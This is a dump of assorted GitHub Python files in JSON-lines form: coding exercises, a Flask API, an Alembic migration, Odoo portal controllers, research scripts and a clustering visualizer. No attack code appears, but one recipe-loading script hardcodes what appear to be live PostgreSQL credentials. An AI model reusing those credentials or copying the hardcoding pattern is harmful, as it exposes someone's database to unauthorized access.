else:\r\n i += 1\r\n\r\n if (sayi1 == 1 and sayi2 == 1):\r\n break\r\n return ekok\r\n\r\nsayi1 = int(input(\"Sayı 1:\"))\r\nsayi2 = int(input(\"Sayı 2:\"))\r\n\r\nprint (\"EKOK:\",ekok_bulma(sayi1,sayi2))\r\n\"\"\"\r\n\r\n\"\"\"\r\n4.ALIŞTIRMA\r\nKullanıcıdan 2 basamaklı bir sayı alın ve bu sayının okunuşunu bulan bir fonksiyon yazın.\"\r\nÖrnek: 97 ---------> Doksan Yedi\r\n\"\"\"\r\n\"\"\"\r\nbirler = [\"\",\"bir\",\"iki\",\"üç\",\"dört\",\"beş\",\"altı\",\"yedi\",\"sekiz\",\"dokuz\"]\r\nonlar = [\"\",\"On\",\"Yirmi\",\"Otuz\",\"Kırk\",\"Elli\",\"Altmış\",\"Yetmiş\",\"Seksen\",\"Doksan\"]\r\n\r\ndef okunus(sayi):\r\n\r\n birinci = sayi % 10\r\n ikinci = sayi // 10\r\n\r\n return onlar[ikinci] + \" \" + birler[birinci]\r\n\r\nsayi = int(input(\"Bir Sayı Girin:\"))\r\n\r\nprint(okunus(sayi))\r\n\"\"\"\r\n\r\n\"\"\"\r\n5.ALIŞTIRMA\r\n1'den 100'e kadar olan sayılardan pisagor üçgeni oluşturanları ekrana yazdıran bir fonksiyon yazın.(a <= 100,b <= 100)\r\n\"\"\"\r\n\"\"\"\r\ndef pisagor_bulma():\r\n\r\n pisagor = list()\r\n\r\n for i in range(1,101):\r\n for j in range(1,101):\r\n\r\n c = (i ** 2 + j ** 2) ** 0.5\r\n\r\n if (c == int(c)):\r\n pisagor.append((i,j,int(c)))\r\n\r\n return pisagor\r\n\r\nfor i in pisagor_bulma():\r\n print(i)\r\n\"\"\"\r\n\r\nL = [4, 12, 2, 43, 15, 36]\r\nL[2:4]\r\n","repo_name":"huzeyfebostan/Calismalarim","sub_path":"Python/Kodlama_Egzersizleri/Fonksiyonlar/Odevler.py","file_name":"Odevler.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19518896439","text":"from flask import request\r\nfrom datetime import datetime\r\n\r\nimport random\r\n\r\nbattery = {\r\n\r\n}\r\n\r\nresponse = \"hello\"\r\n\r\ndef search() -> list:\r\n return battery\r\n\r\ndef addnew():\r\n hash = random.getrandbits(64)\r\n print (request.headers)\r\n batt = { hash : {\r\n \"batlife\": request.json['batlife'],\r\n \"charging\": request.json['charging'],\r\n \"time\": datetime.now(),\r\n \"timeleft\": request.json['timeleft']\r\n }\r\n }\r\n battery.update(batt)\r\n return batt\r\n","repo_name":"JMathiszig-Lee/inductionbingo","sub_path":"api/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31220305068","text":"def response(hey_bob=\"\"):\n \"\"\"\n Bob is a lackadaisical teenager. In conversation, his responses are very limited.\n\n Bob answers 'Sure.' if you ask him a question, such as \"How are you?\".\n\n He answers 'Whoa, chill out!' if you YELL AT HIM (in all capitals).\n\n He answers 'Calm down, I know what I'm doing!' if you yell a question at him.\n\n He says 'Fine. Be that way!' if you address him without actually saying anything.\n\n He answers 'Whatever.' to anything else.\n \"\"\"\n message = hey_bob.strip()\n if not message:\n return \"Fine. Be that way!\"\n elif message.endswith(\"?\") and message.isupper():\n return \"Calm down, I know what I'm doing!\"\n elif message.endswith(\"?\"):\n return \"Sure.\"\n elif message.isupper():\n return \"Whoa, chill out!\"\n else:\n return \"Whatever.\"\n","repo_name":"miwojc/exercism","sub_path":"python/bob/bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70492922347","text":"from pkg_resources import load_entry_point\n\nfrom ..base_options import OptionsHolder\nfrom ..types import FieldValueError, dependency_string, wrap_field_error\n\n\ndef _get_usage_type(type, field='type'):\n try:\n return load_entry_point('mopack', 'mopack.usage', type)\n except ImportError:\n raise FieldValueError('unknown usage {!r}'.format(type), field)\n\n\ndef preferred_path_base(preferred, path_bases):\n if preferred in path_bases:\n return preferred\n elif len(path_bases) > 0:\n return path_bases[0]\n else:\n return None\n\n\nclass Usage(OptionsHolder):\n _default_genus = 'usage'\n _type_field = 'type'\n _get_type = _get_usage_type\n\n def __init__(self, pkg, *, inherit_defaults=False):\n super().__init__(pkg._options)\n\n def version(self, metadata, pkg):\n raise NotImplementedError('Usage.version not implemented')\n\n def _usage(self, pkg, submodules, **kwargs):\n return {'name': dependency_string(pkg.name, submodules),\n 'type': self.type, **kwargs}\n\n def get_usage(self, metadata, pkg, submodules):\n raise NotImplementedError('Usage.get_usage not implemented')\n\n def __repr__(self):\n return '<{}, {}>'.format(type(self).__name__, self.__dict__)\n\n\ndef make_usage(pkg, config, *, field='usage', **kwargs):\n if config is None:\n raise TypeError('usage not specified')\n\n if isinstance(config, str):\n type_field = ()\n type = config\n config = {}\n else:\n type_field = 'type'\n config = config.copy()\n type = config.pop('type')\n\n if not config:\n config = {'inherit_defaults': True}\n\n with wrap_field_error(field, type):\n return _get_usage_type(type, type_field)(pkg, **config, **kwargs)\n","repo_name":"ungtb10d/mopack","sub_path":"mopack/usage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39005743418","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n alphaCountTable = [0]*58\n for c in s:\n alphaCountTable[ord(c)-ord('a')] += 1\n res = 0\n haveOdd = False\n for cnt in alphaCountTable:\n if cnt %2 == 1:\n haveOdd = True\n res += cnt-1\n else:\n res += cnt\n return res+1 if haveOdd else res\n\nif __name__ == '__main__':\n sol = Solution()\n s = \"abccccdd\"\n print(sol.longestPalindrome(s))","repo_name":"LiaoU3/LeetCode","sub_path":"Problems/409_Longest_Palindrome.py","file_name":"409_Longest_Palindrome.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34152383392","text":"import psycopg2\nimport csv\nimport ast\nimport random\n\nconn = psycopg2.connect(\n host=\"reddwarf.cs.rit.edu\",\n database=\"p320_02a\",\n user=\"p320_02a\",\n password=\"mdzpxSyGJSvn\",\n)\n\ncur = conn.cursor()\n\ncur.execute(\"select * from public.users\")\n\n# filename = \"/Users/xinruzou/Downloads/archive/new_pp_recipe.csv\"\n# filename2 = \"/Users/xinruzou/Downloads/archive/new_recipe_raw.csv\"\n\n\nfilename = \"new_pp_recipe.csv\"\nfilename2 = \"new_recipe_raw.csv\"\n\nwith open(filename, 'r', encoding=\"utf8\") as csvfile:\n with open(filename2, 'r', encoding=\"utf8\") as csvfile2:\n print(\"1\")\n\n csvreader = csv.reader(csvfile)\n csvreader2 = csv.reader(csvfile2)\n\n next(csvreader)\n next(csvreader2)\n for rows in csvreader:\n\n recipe_id = rows[0]\n # print(recipe_id)\n ingredients = ast.literal_eval(rows[7])\n\n # check if the recipe exist in the recipe table.\n cur.execute(\"SELECT * FROM public.recipe WHERE recipe_id = %s\", (recipe_id,))\n exist = cur.fetchall()\n if not exist:\n continue\n else:\n for position in range(len(ingredients)):\n\n cur.execute(\"SELECT * FROM public.ingredients WHERE id = %s\"\n , (ingredients[position],))\n\n ingredients_exist = cur.fetchall()\n # this ingredient does not exist in ingredient table\n if not ingredients_exist:\n # loop over the rows in the second file\n for rows2 in csvreader2:\n if rows2[1] == recipe_id:\n int1 = ast.literal_eval(rows2[10])\n ingredient_name = int1[position]\n print(ingredient_name)\n print(\"Insert Ingredient\")\n cur.execute(\"INSERT INTO public.ingredients(id, name, aisle) \"\n \"VALUES( %s, %s, %s)\", (ingredients[position], ingredient_name, \"1\"))\n conn.commit()\n break\n\n # ingredient already exist\n\n cur.execute(\"SELECT * FROM public.ingredient_to_recipe WHERE recipe_id = %s AND ingredient = %s\"\n \"\", (recipe_id, ingredients[position]))\n result = cur.fetchall()\n if not result:\n\n cur.execute(\"INSERT INTO public.ingredient_to_recipe(recipe_id, ingredient) \"\n \"VALUES( %s, %s)\", (recipe_id, ingredients[position]))\n # print(\"success\")\n conn.commit()\n else:\n a = 1\n # print(\"already exist\")\n","repo_name":"Jackxu9946/PDM_Main_Code","sub_path":"ingredient_to_recipe.py","file_name":"ingredient_to_recipe.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10820743870","text":"import argparse\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom utils import load_data, split_data, inference_model_training, recommendation\nfrom obfuscation import differential_privacy, random_obf, frapp_obf, sim_obf, PrivCheck\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--obf', type=str, default='frapp', help=\"DP, random, frapp, similarity, privcheck\")\n parser.add_argument('--beta', default=1, help=\"parameter of DP\")\n parser.add_argument('--p_rand', default=0.5, help=\"parameter of random\")\n parser.add_argument('--gamma', default=100, help=\"parameter of frapp\")\n parser.add_argument('--percentage', default=0.5, help=\"parameter of similarity\")\n parser.add_argument('--deltaX', default=0.60, help=\"parameter of privcheck\")\n parser.add_argument('--cluster_num', default=10, help=\"cluster number for privcheck\")\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--repeats', type=int, default=10)\n args = parser.parse_args()\n\n # random.seed(args.seed)\n\n # load and split data\n df = load_data()\n df_train, df_test, df_test_rec_items = split_data(df)\n\n # inference model training\n model_rf = inference_model_training(df_train, 'rf')\n model_xgb = inference_model_training(df_train, 'xgb')\n print(\"inference model training over.\")\n\n # obfuscation\n if args.obf == 'DP':\n X_obf_dict, X_ori = differential_privacy(df_test, args.beta, repeats=args.repeats)\n elif args.obf == 'random':\n X_obf_dict, X_ori = random_obf(df_test, p_rand=args.p_rand, repeats=args.repeats)\n elif args.obf == 'frapp':\n X_obf_dict, X_ori = frapp_obf(df_test, gamma=args.gamma, repeats=args.repeats)\n elif args.obf == 'similarity':\n X_obf_dict, X_ori = sim_obf(df_test, p=args.percentage, repeats=args.repeats)\n elif args.obf == 'privcheck':\n age_list = list(set(df['age'].values))\n age_list.sort()\n X_obf_dict, X_ori = PrivCheck(df_test, age_list, args.deltaX, args.cluster_num, repeats=args.repeats)\n\n # inference performances & recommendation utility\n rec_oris = []\n rec_obfs = []\n mae_oris_rf = []\n mae_obfs_rf = []\n mae_oris_xgb = []\n mae_obfs_xgb = []\n\n for i in range(args.repeats):\n # recommendation\n rmse_ori, rmse_obf = recommendation(X_obf_dict[i], X_ori, df_test_rec_items)\n rec_oris.append(rmse_ori)\n rec_obfs.append(rmse_obf)\n\n # inference\n df_X_obf = pd.DataFrame.from_dict(X_obf_dict[i]).T\n df_x_obf_items = df_X_obf.values[:, :-2]\n df_X_ori = pd.DataFrame.from_dict(X_ori).T\n df_x_ori_items = df_X_ori.values[:, :-2]\n df_x_y = df_test.values[:, -1]\n\n y_pred_ori_rf = model_rf.predict(df_x_ori_items)\n y_pred_obf_rf = model_rf.predict(df_x_obf_items)\n y_pred_ori_xgb = model_xgb.predict(df_x_ori_items)\n y_pred_obf_xgb = model_xgb.predict(df_x_obf_items)\n\n mae_ori_rf = mean_absolute_error(df_x_y, y_pred_ori_rf)\n mae_obf_rf = mean_absolute_error(df_x_y, y_pred_obf_rf)\n mae_ori_xgb = mean_absolute_error(df_x_y, y_pred_ori_xgb)\n mae_obf_xgb = mean_absolute_error(df_x_y, y_pred_obf_xgb)\n\n mae_oris_rf.append(mae_ori_rf)\n mae_obfs_rf.append(mae_obf_rf)\n mae_oris_xgb.append(mae_ori_xgb)\n mae_obfs_xgb.append(mae_obf_xgb)\n\n m_rmse_ori = np.mean(rec_oris)\n m_rmse_obf = np.mean(rec_obfs)\n\n m_mae_ori_rf = np.mean(mae_oris_rf)\n m_mae_obf_rf = np.mean(mae_obfs_rf)\n m_mae_ori_xgb = np.mean(mae_oris_xgb)\n m_mae_obf_xgb = np.mean(mae_obfs_xgb)\n\n print(\"Utility on Recommendation\")\n print(\"Ori RMSE: {:.4f}, Obf RMSE: {:.4f}\".format(m_rmse_ori, m_rmse_obf))\n print(\"Age Inference Performances\")\n print(\"RandomForest - Ori MAE: {:.4f}, Obf MAE: {:.4f}\".format(m_mae_ori_rf, m_mae_obf_rf))\n print(\"XGBoost - Ori MAE: {:.4f}, Obf MAE: {:.4f}\".format(m_mae_ori_xgb, m_mae_obf_xgb))\n","repo_name":"SUFE-AILAB-HXGROUP/PPDP","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14478194302","text":"from odoo import http, _\nfrom odoo.http import request\nfrom odoo.addons.portal.controllers.portal import CustomerPortal\nfrom odoo.exceptions import AccessError, MissingError\n\n\nclass VetPortalController(CustomerPortal):\n def _prepare_portal_layout_values(self):\n values = super(\n VetPortalController, self\n )._prepare_portal_layout_values()\n animal_count = request.env[\"res.animal\"].search_count([])\n appointment_count = request.env[\"animal.appointment\"].search_count(\n []\n )\n values.update(\n {\n \"animal_count\": animal_count,\n \"appointment_count\": appointment_count,\n },\n )\n return values\n\n @http.route(\"/my/animals\", type=\"http\", auth=\"user\", website=True)\n def animals_list(self, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n searchbar_sortings = {\n \"name\": {\"label\": _(\"Name\"), \"order\": \"name\"},\n \"age\": {\"label\": _(\"Age\"), \"order\": \"birthday desc\"},\n }\n\n if not sortby:\n sortby = \"name\"\n sort_order = searchbar_sortings[sortby][\"order\"]\n\n animals = request.env[\"res.animal\"].search([], order=sort_order)\n\n values.update(\n {\n \"animals\": animals,\n \"page_name\": \"my_animals\",\n \"default_url\": \"/my/animals\",\n \"searchbar_sortings\": searchbar_sortings,\n \"sortby\": sortby,\n }\n )\n return request.render(\"med_vet_manager.animals_list\", values)\n\n def _animal_get_page_view_values(self, animal, access_token, **kwargs):\n values = {\n \"page_name\": \"animal\",\n \"animal\": animal,\n }\n return self._get_page_view_values(\n animal,\n access_token,\n values,\n \"my_animals_history\",\n False,\n **kwargs\n )\n\n @http.route(\n [\"/my/animals/\"],\n type=\"http\",\n auth=\"public\",\n website=True,\n )\n def portal_my_animal(self, animal_id=None, access_token=None, **kw):\n try:\n animal_sudo = self._document_check_access(\n \"res.animal\", animal_id, access_token\n )\n except (AccessError, MissingError):\n return request.redirect(\"/my\")\n\n values = self._animal_get_page_view_values(\n animal_sudo, access_token, **kw\n )\n return request.render(\"med_vet_manager.portal_my_animal\", values)\n\n # APPOINTMENTS\n\n @http.route(\"/my/appointments\", type=\"http\", auth=\"user\", website=True)\n def appointments_list(self, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n searchbar_sortings = {\n \"name\": {\"label\": _(\"Name\"), \"order\": \"name\"},\n \"date\": {\"label\": _(\"Date\"), \"order\": \"date desc\"},\n \"stage\": {\"label\": _(\"Stage\"), \"order\": \"stage_id\"},\n }\n\n if not sortby:\n sortby = \"date\"\n sort_order = searchbar_sortings[sortby][\"order\"]\n\n appointments = request.env[\"animal.appointment\"].search(\n [], order=sort_order\n )\n\n values.update(\n {\n \"appointments\": appointments,\n \"page_name\": \"my_appointments\",\n \"default_url\": \"/my/appointments\",\n \"searchbar_sortings\": searchbar_sortings,\n \"sortby\": sortby,\n }\n )\n return request.render(\"med_vet_manager.appointments_list\", values)\n\n def _appointment_get_page_view_values(\n self, appointment, access_token, **kwargs\n ):\n values = {\n \"page_name\": \"appointment\",\n \"appointment\": appointment,\n }\n return self._get_page_view_values(\n appointment,\n access_token,\n values,\n \"my_appointments_history\",\n False,\n **kwargs\n )\n\n @http.route(\n [\"/my/appointments/\"],\n type=\"http\",\n auth=\"public\",\n website=True,\n )\n def portal_my_appointment(\n self, appointment_id=None, access_token=None, **kw\n ):\n try:\n appointment_sudo = self._document_check_access(\n \"animal.appointment\", appointment_id, access_token\n )\n except (AccessError, MissingError):\n return request.redirect(\"/my\")\n\n values = self._appointment_get_page_view_values(\n appointment_sudo, access_token, **kw\n )\n return request.render(\n \"med_vet_manager.portal_my_appointment\", values\n )\n","repo_name":"felipepaloschi/odoo-course","sub_path":"med_vet_manager/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32693456507","text":"import random\nfrom .fraction import Fraction\n\nclass CoinMachine:\n\n def __init__(self, coins_for_one_exp: int, number_of_exits_to_cont: int, number_of_exits_event_happened: int):\n if coins_for_one_exp < 1:\n raise ValueError(\"Bad number of coins\")\n self.coin_count = coins_for_one_exp\n max_number = 2 ** coins_for_one_exp\n if number_of_exits_to_cont + number_of_exits_event_happened > max_number:\n raise ValueError(\"Bad numbers\")\n if number_of_exits_to_cont + number_of_exits_event_happened >= max_number:\n raise ValueError(\"Probability is const\")\n exits_list = random.sample(range(2 ** coins_for_one_exp), number_of_exits_to_cont + number_of_exits_event_happened)\n self.exits_to_continue = exits_list[:number_of_exits_to_cont]\n self.exits_event_happened = exits_list[number_of_exits_to_cont:]\n\n\n def description(self):\n return 'Автомат за раз подбрасывает {} монет. В случае выпадания одного из {} исходов, подбрасывания продолжаются. В случае выпадания одного из {} других исходов, считается, что событие произошло. Иначе - событие не произошло'.\\\n format(self.coin_count, len(self.exits_to_continue), len(self.exits_event_happened))\n \n def conduct(self):\n res = random.randint(0, 2 ** self.coin_count)\n while res in self.exits_to_continue:\n res = random.randint(0, 2 ** self.coin_count)\n if res in self.exits_event_happened:\n return True\n return False\n \n def probability_by_formula(self):\n x = 2 ** self.coin_count\n return Fraction(len(self.exits_event_happened), x - len(self.exits_to_continue))\n\n\n def try_experiments(self, number: int):\n result = []\n for i in range(number):\n result.append(self.conduct())\n good_exits = result.count(True)\n return good_exits / number","repo_name":"sgwps/coins_flipper","sub_path":"coin_machine/main/logic/coin_machine.py","file_name":"coin_machine.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17198618198","text":"def CDT(usuario:str, capital:int, tiempo:int):\r\n valorIntereses = 0\r\n valorTotal = 0\r\n \r\n if tiempo > 2:\r\n valorIntereses = capital * 0.03 * tiempo / 12\r\n valorTotal = valorIntereses + capital\r\n\r\n return \"Para el usuario {} La cantidad de dinero a recibir, según el monto inicial {} para un tiempo de {} meses es: {}\".format(usuario, capital, tiempo, valorTotal)\r\n\r\n else: \r\n valorIntereses = capital * 0.02\r\n valorTotal = capital - valorIntereses\r\n\r\n return \"Para el usuario {} La cantidad de dinero a recibir, según el monto inicial {} para un tiempo de {} meses es: {}\".format(usuario, capital, tiempo, valorTotal)\r\n\r\n\r\nprint(CDT('user91', 1000000, 3))\r\nprint(CDT('user91', 650000, 2))\r\n","repo_name":"mario994/MisionTIC-Ruta-2-2022-UTP","sub_path":"Programming/Cicle_1/Unit_2/Challenge_1/Challenge1Solution.py","file_name":"Challenge1Solution.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74938226667","text":"#!/usr/bin/env python\n\"\"\"\nCommand line interface for running sample queries\n\"\"\"\n\nimport os\nimport argparse\nfrom pprint import pprint\nfrom json import dump\n\nfrom asld.search import ASLDSearch, Algorithm\nfrom asld.sample_queries import automatons\n\nfrom asld.utils.color_print import Color\n\n\n# Parse arguments\n# ===============\nparser = argparse.ArgumentParser(description='Process some queries')\n\n# Query\nparser.add_argument('-w', metavar='w', type=int, default=1,\n help='weight to use on the heuristic')\nparser.add_argument('-q', metavar='q', type=int, default=0,\n help='query ID')\n\n# Search tuning\nparser.add_argument(\"--slow-goal\", help=\"Use regular goal declaration\", action=\"store_true\")\nparser.add_argument('--pool-size', metavar='p', type=int, default=40,\n help='Process pool size to use')\n\n# Search limits\nparser.add_argument('--time', metavar='t', type=int, default=10*60,\n help='Time limit [s]')\nparser.add_argument('--ans', metavar='a', type=int, default=1e3,\n help='Answer limit')\nparser.add_argument('--triples', metavar='s', type=int, default=1e5,\n help='Triples limit')\n\nparser.add_argument('--alg', metavar='t', type=str, default=\"a*\",\n help='A* | Dijkstra | BFS | DFS')\n\nargs = parser.parse_args()\n\nALGORITHM = Algorithm.parse(args.alg)\nALGORITHM_N = Algorithm.to_string(ALGORITHM)\nw = args.w\nquick_goal = not args.slow_goal\nquery_number = args.q\n\nparallel_requests = args.pool_size\n\nlimit_time = args.time\nlimit_ans = args.ans\nlimit_triples = args.triples\n\n(query, query_name) = automatons[query_number]\n\n\nif query is None:\n print(\"Review the query number\")\nelse:\n # Run query\n # =========\n data = None\n result = {\n \"query\": query_name,\n \"params\": {\n \"limits\": {\n \"time\": limit_time,\n \"triples\": limit_triples,\n \"ans\": limit_ans,\n },\n \"algorithm\": ALGORITHM_N,\n \"parallelRequests\": parallel_requests,\n \"quickGoal\": quick_goal,\n \"weight\": w\n },\n \"data\": data\n }\n\n try:\n print(\"Solving %s...\" % query_name)\n\n print(\"Parameters:\")\n print(\" Algorithm: %s\" % ALGORITHM_N)\n print(\" Quick-Goal: %s\" % quick_goal)\n print(\" Weight: %d\" % w)\n print(\" Pool Size: %d\" % parallel_requests)\n print(\" Limits:\")\n print(\" Time: %ds\" % limit_time)\n print(\" Answers: %d\" % limit_ans)\n print(\" Triples: %d\" % limit_triples)\n\n # Run search\n search = ASLDSearch(query(w=w), quick_goal=quick_goal, alg=ALGORITHM)\n\n data = search.test(parallel_requests,\n limit_time = limit_time,\n limit_ans = limit_ans,\n limit_triples = limit_triples)\n result[\"data\"] = data\n\n\n except KeyboardInterrupt:\n Color.BLUE.print(\"\\nTerminating search.\")\n\n finally:\n # Make sub-directory\n results_directory = \"bench/last/\"\n results_directory += \"q%d-%s/\" % (query_number, query_name)\n\n results_directory += \"p%d/\" % parallel_requests\n if quick_goal:\n results_directory += \"quick/\"\n else:\n results_directory += \"slow/\"\n os.makedirs(results_directory, mode=0o777, exist_ok=True)\n\n # Save files\n fileName = results_directory\n fileName += \"q%d--\" % query_number\n fileName += \"%s\" % ALGORITHM_N\n fileName += \"-w%d\" % w\n fileName += \"-p%d\" % parallel_requests\n if quick_goal:\n fileName += \"-quickGoal\"\n else:\n fileName += \"-slowGoal\"\n fileName += \"-time%d-ans%d-triples%d\" % (limit_time,\n limit_ans,\n limit_triples)\n fileName += \".json\"\n\n print(\"Writing log to %s\" % fileName)\n with open(fileName, 'w') as f:\n dump(result, f, indent=2)\n\n if data:\n stats = data[\"StatsHistory\"]\n if stats:\n Color.BLUE.print(\"Last stats:\")\n pprint(stats[-1])\n","repo_name":"Dietr1ch/asld","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71132877546","text":"\"\"\"initial migration\n\nRevision ID: e3f539a683a3\nRevises: \nCreate Date: 2021-01-14 03:24:10.557006\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"e3f539a683a3\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"contact_types\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"hex_colour\", sa.String(length=8), nullable=True),\n sa.Column(\"type\", sa.String(length=64), nullable=True),\n sa.Column(\"description\", sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"projects\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"address\", sa.String(length=256), nullable=True),\n sa.Column(\"city\", sa.String(length=64), nullable=True),\n sa.Column(\"province\", sa.String(length=64), nullable=True),\n sa.Column(\"postal_code\", sa.String(length=64), nullable=True),\n sa.Column(\"neighbourhood\", sa.String(length=256), nullable=True),\n sa.Column(\"year\", sa.Integer(), nullable=True),\n sa.Column(\"name\", sa.String(length=64), nullable=True),\n sa.Column(\"type\", sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"users\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=64), nullable=False),\n sa.Column(\"email\", sa.String(length=64), nullable=False),\n sa.Column(\"role\", sa.String(length=32), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"email\"),\n sa.UniqueConstraint(\"id\"),\n sa.UniqueConstraint(\"role\"),\n )\n op.create_table(\n \"contact\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=256), nullable=False),\n sa.Column(\"email\", sa.String(length=256), nullable=False),\n sa.Column(\"secondary_email\", sa.String(length=256), nullable=True),\n sa.Column(\"cellphone\", sa.String(length=256), nullable=False),\n sa.Column(\"role\", sa.String(length=256), nullable=True),\n sa.Column(\"organization\", sa.String(length=256), nullable=False),\n sa.Column(\"neighbourhood\", sa.String(length=256), nullable=True),\n sa.Column(\"contact_type\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.ForeignKeyConstraint(\n [\"contact_type\"],\n [\"contact_types.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_table(\n \"donations\",\n sa.Column(\"id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"name\", sa.String(length=64), nullable=False),\n sa.Column(\"email\", sa.String(length=64), nullable=False),\n sa.Column(\"date\", sa.DateTime(), nullable=True),\n sa.Column(\"donation_source\", sa.String(length=128), nullable=False),\n sa.Column(\"event\", sa.String(length=128), nullable=True),\n sa.Column(\"num_tickets\", sa.Integer(), nullable=True),\n sa.Column(\"added_by\", postgresql.UUID(as_uuid=True), nullable=True),\n sa.ForeignKeyConstraint(\n [\"added_by\"],\n [\"users.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"email\"),\n )\n op.create_table(\n \"association\",\n sa.Column(\"contact_id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column(\"project_id\", postgresql.UUID(as_uuid=True), nullable=False),\n sa.ForeignKeyConstraint(\n [\"contact_id\"],\n [\"contact.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"project_id\"],\n [\"projects.id\"],\n ),\n sa.PrimaryKeyConstraint(\"contact_id\", \"project_id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"association\")\n op.drop_table(\"donations\")\n op.drop_table(\"contact\")\n op.drop_table(\"users\")\n op.drop_table(\"projects\")\n op.drop_table(\"contact_types\")\n # ### end Alembic commands ###\n","repo_name":"hack4impact-mcgill/mu-crm-tool","sub_path":"backend/migrations/versions/e3f539a683a3_initial_migration.py","file_name":"e3f539a683a3_initial_migration.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17113520050","text":"import copy\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport numpy as np\n\nfrom usac.visualizations.visualizer import Visualizer\nfrom usac.visualizations.utils import labels_for_timestep\nfrom usac.visualizations.utils import cmap_for_timestep\n\ndef idxs_to_coords(idxs: np.ndarray, rows: int, cols: int):\n idxs = np.array(idxs)\n assert (idxs < rows * cols).all()\n xs = idxs % cols\n ys = idxs // cols\n return xs, ys\n\ndef split_label(label: int, dendogram: np.ndarray, rows: int, cols: int):\n max_index = rows * cols\n # breakpoint()\n # print(f\"exploring label {label}\")\n if label < max_index:\n return label, \"\", [label], []\n\n subcluster_1, subcluster_2 = dendogram[label - max_index]\n\n # Right side of tree\n _, _, c1, c2 = split_label(subcluster_1, dendogram, rows, cols)\n left_cluster = c1 + c2\n\n # Left side of tree\n _, _, c1, c2 = split_label(subcluster_2, dendogram, rows, cols)\n right_cluster = c1 + c2\n\n return subcluster_1, subcluster_2, left_cluster, right_cluster\n\nclass ClickSplitVisualizer(Visualizer):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def clicked(self, ev, ax, fig, im, dendogram: np.ndarray) -> None:\n x, y = int(ev.xdata), int(ev.ydata)\n current_label = self.current_labels[y, x]\n\n # print(\"BEFORE\", np.unique(self.current_labels))\n\n if self.mode == 'join':\n if current_label >= self.rows*self.cols + len(dendogram):\n print(\"You've reached the top of the tree. Click on another color...\")\n else:\n row = np.where(current_label == dendogram)[0][0]\n c1, c2 = dendogram[row]\n mask = (self.current_labels == c1) | (self.current_labels == c2)\n self.current_labels[mask] = self.rows * self.cols + row\n else:\n newlabel1, newlabel2, c1, c2 = split_label(current_label, dendogram, self.rows, self.cols)\n c1x, c1y = idxs_to_coords(c1, self.rows, self.cols)\n c2x, c2y = idxs_to_coords(c2, self.rows, self.cols)\n self.current_labels[c1y, c1x] = newlabel1\n self.current_labels[c2y, c2x] = newlabel2\n\n # print(\"AFTER\", np.unique(self.current_labels))\n # print('------')\n\n # Reset labels to something low\n tmp_labels = self.current_labels.reshape(-1)\n unique, tmp_labels = np.unique(tmp_labels, return_inverse=True)\n\n 